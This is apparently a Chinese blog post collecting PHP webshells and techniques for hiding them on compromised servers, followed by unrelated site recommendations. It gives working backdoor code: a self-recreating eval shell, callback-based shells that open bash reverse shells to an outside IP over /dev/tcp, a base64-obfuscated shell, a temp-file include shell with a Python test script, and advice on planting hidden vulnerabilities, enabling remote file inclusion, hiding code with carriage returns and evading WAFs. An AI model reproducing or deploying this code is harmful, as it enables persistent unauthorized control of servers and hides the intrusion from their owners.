优质广告供应商

广告是为了更好地支持作者创作

搜集一些比较猛的php webshell


一 . WebShell 驻留内存 , 轮询并自动创建

<?php
    ignore_user_abort(true);
    set_time_limit(0);
    $file = 'c.php';
    $code = '<?php eval($_POST[c]);?>';
    while(true) {
        if(!file_exists($file)) {
            file_put_contents($file, $code);
        }
        usleep(50);
    }
?>

二 . 很隐蔽的 webshell

<?php
session_start();
extract($_GET);
if(preg_match('/[0-9]/',$_SESSION['PHPSESSID'])){exit;}
if(preg_match('/\/|\./',$_SESSION['PHPSESSID'])){exit;}
include(ini_get("session.save_path")."/sess_".$_SESSION['PHPSESSID']);
?>

三 . 使用回调函数

1. ob_start

# 自动触发
<?php function a($b){exec('/bin/bash -c "bash -i >& /dev/tcp/8.8.8.8/8888 0>&1"');}ob_start("a");?>

2. header_register_callback

# 自动触发
<?php function a() {exec('/bin/bash -c "bash -i >& /dev/tcp/8.8.8.8/8888 0>&1"');}header_register_callback('a');?>
<?php function a() {$_GET[c]($_GET[d]);}header_register_callback('a');?>

3. filter_input

# 需要 POST 一个 C 参数 , 就会触发反弹 shell
<?php function a($value){ exec('/bin/bash -c "bash -i >& /dev/tcp/8.8.8.8/8888 0>&1"');}filter_input(INPUT_POST, 'c', FILTER_CALLBACK, array('options' => 'a'));?>
# 直接菜刀连接 , 密码为 c
http://127.0.0.1/index.php?&c=assert&d=eval($_POST['c'])
<?php function a($c){$c($_GET['d']);}filter_input(INPUT_GET,'c', FILTER_CALLBACK,array('options'=>'a'));?>

4. 类似的函数还有 :

filter_var() - Filters a variable with a specified filter
filter_input_array() - Gets external variables and optionally filters them
filter_var_array() - Gets multiple variables and optionally filters them

5. stream_wrapper_register

<?php
class A{
    function __construct(){
        phpinfo();
        // $_GET[c]($_GET[d]);
    }
}
stream_wrapper_register("st", "A");
$fp = fopen("st://","r");
?>

6. 通过构造上述的webshell

其实发现了一些思路关于如何隐藏 WebShell
当我们已经得到一个已知的 webshell 以后
我认为最好的 webshell 就是将 webshell 隐藏在目标服务器的正常代码逻辑中
例如 :

1. 为某类添加魔术函数 (但是需要保证这个函数可以被我们触发)
2. 构造一个新的漏洞 , 别人比较难以发现 , 但是我们可以很容易就可以触发
3. 修改 php 配置文件 , 开启远程文件包含等比较危险的配置 (这样 webshell 并不需要保存在目标硬盘上 , 直接发送请求即可动态调用)
4. 挂上内存马
5. ... 待整理


<?php @base64_decode($_GET['a'])($_GET[b]);?>

障眼法 :

\r 为ASCII控制字符
如果一个文件中存在控制字符 \r
那么如果在终端中 cat 的时候就会控制光标移动到行首
例如 : 
image.png
image.png

文件包含法 :

通过包含上传的临时文件
服务器在处理上传文件的时序关系如下图 : 
image.png

webshell如下 :

<?php
include($_FILES["file"]["tmp_name"]);
?>

测试 :

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests

url = "http://127.0.0.1/index.php?c=system('id');"
files = {'file': ('filename.php', '<?php eval($_REQUEST[c]);?>', 'image/jpeg')}
response = requests.post(url, files=files)
content = response.content
print content
image.png

发一波过狗截图 :

image.png
image.png

优质广告供应商

广告是为了更好地支持作者创作

推荐阅读更多精彩内容

  • Spring Cloud为开发人员提供了快速构建分布式系统中一些常见模式的工具(例如配置管理,服务发现,断路器,智...
    卡卡罗2017阅读 131,289评论 18 138
  • 5月第一周小结 本周个人生活消费704元。 形象设计学习:3小时,交作业1次。 爬山1次,耗时8小时。 跑步5个5...
    娟妹纸李娟阅读 123评论 0 0
  • 优质广告供应商

    广告是为了更好地支持作者创作

  • ————于无意中震惊于小小的行为艺术,多次临摹,然后便促成了画作 。 ⑴看似大度,实则暗藏祸心,自负的以为深喑世故...
    若水落差阅读 164评论 0 0
  • 本文分享一款2017年最新的2017年最新基于Bootstrap 4 的专业、多用途响应式布局的系统模板,该模板是...
    Rector阅读 386评论 0 4
  • 若是我满头白发 或许陪着我的是时间 可我正青春年少 踩着阳光看影子忽短忽长 或许与我并行的是时间 我抬...
    参辰阅读 45评论 0 0